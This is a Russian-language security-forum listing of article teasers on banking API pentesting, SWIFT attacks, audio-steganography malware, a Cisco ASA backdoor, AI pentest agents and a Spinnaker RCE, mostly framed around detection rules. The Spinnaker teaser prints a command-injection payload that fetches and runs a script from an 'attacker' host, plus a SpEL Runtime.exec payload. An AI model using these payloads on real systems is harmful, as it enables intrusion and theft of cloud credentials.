Форум информационной безопасности - Codeby.net
Статья Уязвимости банковских API: методология пентеста от разведки до эксплуатации
Один параметр в URL — баланс чужого счёта. Банк прошёл PCI DSS месяц назад, использовал OAuth 2.0 и API Gateway от крупного вендора. BOLA остаётся уязвимостью №1 уже который год.OWASP API Top 10: BOLA (подмена account_id в GET-запросе), BFLA (вызов /api/internal/refund с пользовательским токеном без проверки роли), race condition через single-packet attack в Burp — два одновременных списания до обновления баланса. JWT algorithm confusion: RS256→HS256 с публичным ключом через jwt_tool -X a.
WAF не видит BOLA и BFLA — запросы синтаксически легитимны. PCI DSS не проверяет, может ли User A увидеть баланс User B — буквально вне скоупа. Burp Autorize автоматизирует подстановку токенов. Decision tree: два аккаунта → BOLA/BFLA первыми, платёжные эндпоинты → race condition.
Shadow API (v1/ при живой v3/) — вектор без fraud-detection и rate limiting.Статья Кибератаки на финансовый сектор 2025–2026: TTPs, kill chain и detection-правила для SOC
43% рост атак на финансовый сектор России за 2025 год. Банкеры выросли в 4 раза, шифровальщики — максимум за два года, supply chain — 26% инцидентов. И каждый шаг выглядит легитимно.GodRAT через SCR с стеганографией, Cobalt Strike Beacon через DLL Hijacking легитимных утилит, FunkSec останавливает 50+ процессов до шифрования. AiTM обходит MFA как класс защиты. 68% инцидентов — фишинг, но GenAI ускоряет генерацию писем в 11,4 раза. Подрядчиков взломать проще и дешевле — 26% атак идут через supply chain.
Типовой kill chain от SCR-вложения до SWIFT-сегмента с маппингом T1566.001, T1027, T1562.001, T1486, T1657. Два Sigma-правила: запуск SCR из %TEMP% и остановка защитных сервисов. Корреляционная цепочка за 60 минут — три события по отдельности шум, три в цепочке — critical alert.
Оборотный штраф + выкуп = цена пропущенного инцидента в 2026 году.Статья Стеганография в аудиофайлах: как малварь прячут внутри WAV и как это обнаружить
Инцидент в финтехе: бот обновлял payload через WAV с CDN — EDR молчал, на диске ни одного PE-файла. Turla и Cylance 2019 — стеганография в аудио давно не CTF-экзотика.3-минутный WAV 44.1 кГц — 2 МБ ёмкости в младших битах. Изменение амплитуды на 1/65536 неразличимо на слух. DLP считает это «пользователь слушает музыку», sandbox не запускает WAV, SIEM не видит GET на .wav в потоке трафика. Три типа загрузчиков в одной кампании: LSB-стеганография, rand()-based PE и rand()-based shellcode — XMRrig плюс Metasploit reverse shell.
Единственный масштабируемый детект — поведенческий: процесс читает WAV и в течение 60 секунд лезет в сеть. Энтропийный анализ, тест хи-квадрат и спектрограмма в Audacity — ловят только незашифрованные реализации.
YARA-правило на MZ/ELF/shellcode-прологи внутри WAV.Статья Атаки на SWIFT и межбанковские системы: kill chain от фишинга до вывода средств
19 дней от spear-phishing до операторского АРМ SWIFT в банке из топ-30. Один сервисный аккаунт с правами на обе зоны превратил формальную сегментацию в декорацию.Bangladesh Bank — $81 млн за одну ночь, Lazarus модифицировал Alliance Access для подавления печати подтверждений. «Глобэкс» — первый SWIFT-вывод в России, Cobalt от initial access до вывода за 3-4 недели. Valid Accounts (T1078) с реальными credentials оператора: аутентификация выглядит легитимно — SIEM молчит.
Полный kill chain с маппингом MITRE ATT&CK: T1566.001 → T1056.001 → T1078 → T1565.002 → T1657. Два Sigma-правила: логин оператора вне рабочего времени и создание файлов в директории Alliance Access. Матрица контролей SWIFT CSP против каждой фазы — и почему CSP не защищает от атаки через офисный сегмент.
Cobalt и Lazarus приходят изнутри, а не из интернета.Статья Реагирование на инциденты информационной безопасности: от алерта до изоляции за 30 минут
Понедельник 9:15 — mass file encryption. Через 12 минут ещё три хоста. Атакующие сидели неделю, данные уже ушли. Разница между «под контролем» и «на DLS» — первые 30 минут триажа.75% вторжений используют валидные credentials, медианный dwell time — 11 дней, 57% организаций узнают от внешней стороны. Decision tree триажа: единичный алерт или кластер → маппинг TTPs на MITRE ATT&CK → критичность актива → lateral movement. Lateral movement — проверяйте первым, а не последним.
Три параллельных потока для определения масштаба: EDR-телеметрия, SIEM за 14 дней назад, NetFlow на beaconing. Memory dump — до любых действий. Chain of custody — SHA256 + UTC + ФИО аналитика. Sigma-правило на mass share access и минимальный detection-чеклист для SOC.
Главный вывод: decision matrix «кто нажимает isolate без согласования» важнее любого playbook.Статья Безопасность Infrastructure as Code: от мисконфигурации в Terraform до detection-правила в SIEM
Capital One, LA Times, Twilio — три инцидента, три мисконфигурации, которые ловятся checkov -d . за секунды. Четыре года IaC-сканирования в production: ни одна найденная проблема не добралась до прода.Пять категорий: публичный доступ (T1580), wildcard IAM (T1078.004), отсутствие шифрования (T1552.001), пробелы в логировании (T1562.008), избыточный сетевой доступ. Две стратегии: HCL-скан на этапе PR за секунды, план-скан перед apply — ловит динамические выражения и переменные. Checkov, Trivy, KICS, Terrascan — выбор по стеку.
Главная слепая зона: configuration drift. Разработчик добавил 0.0.0.0/0 через консоль — сканер молчит. CSPM + SIEM-правило на AuthorizeSecurityGroupIngress не от CI/CD role — второй эшелон. Suppression rate как метрика: 200 skip-аннотаций в репо — сканер стал формальностью.
Detection-чеклист CloudTrail событий с MITRE ATT&CK для SOC.Статья FIRESTARTER на Cisco ASA: как бэкдор переживает патчи
6 месяцев dwell time на пропатченном Cisco Firepower: патч закрыл дверь, а FIRESTARTER уже внутри. Graceful shutdown — момент, когда имплант прописывает автозапуск в CSP_MOUNT_LIST.UAT-4356 (ArcaneDoor): CVE-2025-20362 (PR:N, автоматизируема) + CVE-2025-20333 (CVSS 9.9, RCE) через WebVPN. FIRESTARTER живёт в LINA-процессе — show version, show running-config, syslog молчат. Magic packet через WebVPN активирует без эксплуатации CVE. Полностью пропатченное устройство доступно бессрочно.
CSP_MOUNT_LIST модифицируется при SIGTERM → boot восстанавливает её до чистого состояния. Firmware upgrade = graceful shutdown = имплант выживает. Удаляет только hard power cycle или полный reimage. IBM X-Force: среднее время устранения CVE — 29 месяцев. CISA дала один день.
CLI-команда для проверки + YARA IOC + decision tree при подозрении на компрометацию.Статья AI-агенты в пентесте: от 91% на CTF до провала в Active Directory
PentestGPT v2: 91% на веб-задачах и 4/5 хостов в GOAD — но агент без throttling'а засвечивается быстрее шумного скрипт-кидди. Два типа отказов, которые не лечатся заменой модели.28 LLM-агентов проанализированы — и у всех один разлом. Type A (нет инструмента, плохой промпт) лечится инженерией. Type B (преждевременная фиксация на ветке, бесконечная разведка, забывание контекста на шаге 7) — нет. GPT-5 как backbone сжимает разрыв между агентами вдвое: архитектурные надстройки деградируют по мере прогресса моделей.
TDA — difficulty-aware planning — снижает долю Type B с 58% до 27%. State management удваивает результаты hackingBuddyGPT на privesc без замены модели. Sigma-набор на T1046 ловит агента раньше, чем он добирается до эксплуатации.
Decision tree: когда AI-агент даёт ROI, а когда — шум в логах SOC.Статья Символьное исполнение для поиска уязвимостей: angr, Manticore и Triton на практике
angr, Manticore, Triton: «wyvern» CSAW CTF 500 — 15 минут скриптом вместо часов в Ghidra. Честный разбор трёх символьных движков с decision tree и кодом.Символьное исполнение заменяет конкретный ввод символическими переменными, накапливает constraints на каждом ветвлении и скармливает Z3-солверу — тот находит ввод математически, без перебора. angr — CTF rev/pwn и AEG, еженедельные коммиты. Manticore — разработка остановлена, EVM-наработки ещё ценны. Triton — DSE поверх конкретного trace, незаменим для деобфускации VMProtect и Themida.
Path explosion убивает анализ на реальных бинарях: SHA-256 на критическом пути — стоп-сигнал. Concolic через angr+Unicorn: распаковка конкретно, символьный анализ включается после. Шесть строк кода на fauxware, strcpy_find за 2 секунды, автоматическая AEG.
Fuzzer за час находит то, что символьный движок ищет сутки — но concolic генерирует ввод через magic bytes.Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.